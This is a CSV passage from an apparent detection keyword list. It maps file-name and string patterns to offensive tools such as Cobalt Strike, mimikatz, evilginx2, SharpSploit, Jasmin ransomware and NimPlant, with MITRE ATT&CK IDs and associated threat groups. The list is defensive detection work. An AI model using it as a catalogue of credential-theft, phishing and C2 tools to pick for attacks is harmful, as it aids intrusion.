"*.img.123456.*",".{0,1000}\.img\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4676"
"*.jpeg.jasmin*",".{0,1000}\.jpeg\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4679"
"*.jpg.exe*",".{0,1000}\.jpg\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4680"
"*.jpg.iso*",".{0,1000}\.jpg\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4681"
"*.jpg.jasmin*",".{0,1000}\.jpg\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4682"
"*.kb.123456.*",".{0,1000}\.kb\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4683"
"*.kerberoast.txt*",".{0,1000}\.kerberoast\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","N/A","3","226","31","2024-09-23T18:11:26Z","2022-12-30T23:35:40Z","4684"
"*.kirbi *",".{0,1000}\.kirbi\s.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","4685"
"*.lab.evilginx.com*",".{0,1000}\.lab\.evilginx\.com.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","4687"
"*.LateralMovement.PowerShellRemoting*",".{0,1000}\.LateralMovement\.PowerShellRemoting.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4688"
"*.LateralMovement.SCM.*",".{0,1000}\.LateralMovement\.SCM\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4689"
"*.LateralMovement.WMI.WMIExecute(*",".{0,1000}\.LateralMovement\.WMI\.WMIExecute\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4690"
"*.ldapdump.txt*",".{0,1000}\.ldapdump\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","N/A","3","226","31","2024-09-23T18:11:26Z","2022-12-30T23:35:40Z","4691"
"*.link/links/windows/target/x86_64-pc-windows-gnu/release/link.exe*",".{0,1000}\.link\/links\/windows\/target\/x86_64\-pc\-windows\-gnu\/release\/link\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","4692"
"*.lists.123456.*",".{0,1000}\.lists\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4693"
"*.live.123456.*",".{0,1000}\.live\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4694"
"*.local.kirbi*",".{0,1000}\.local\.kirbi.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","4695"
"*.m.123456.*",".{0,1000}\.m\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4698"
"*.mail.123456.*",".{0,1000}\.mail\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4699"
"*.media.123456.*",".{0,1000}\.media\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4700"
"*.mobile.123456.*",".{0,1000}\.mobile\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4702"
"*.mysql.123456.*",".{0,1000}\.mysql\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4706"
"*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation *",".{0,1000}\.NET\spost\-exploitation\stoolkit\sfor\sActive\sDirectory\sreconnaissance\sand\sexploitation\s.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","0","#content","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","4707"
"*.news.123456.*",".{0,1000}\.news\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4708"
"*.nimplant*",".{0,1000}\.nimplant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","4710"
"*.O365.GroupMembership_AdminGroups.txt*",".{0,1000}\.O365\.GroupMembership_AdminGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4711"
"*.O365.GroupMembership_VPNGroups.txt*",".{0,1000}\.O365\.GroupMembership_VPNGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4712"
"*.O365.Roles_Admins.txt*",".{0,1000}\.O365\.Roles_Admins\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4713"
"*.O365.Users_Detailed.csv*",".{0,1000}\.O365\.Users_Detailed\.csv.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","8","715","103","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z","4714"
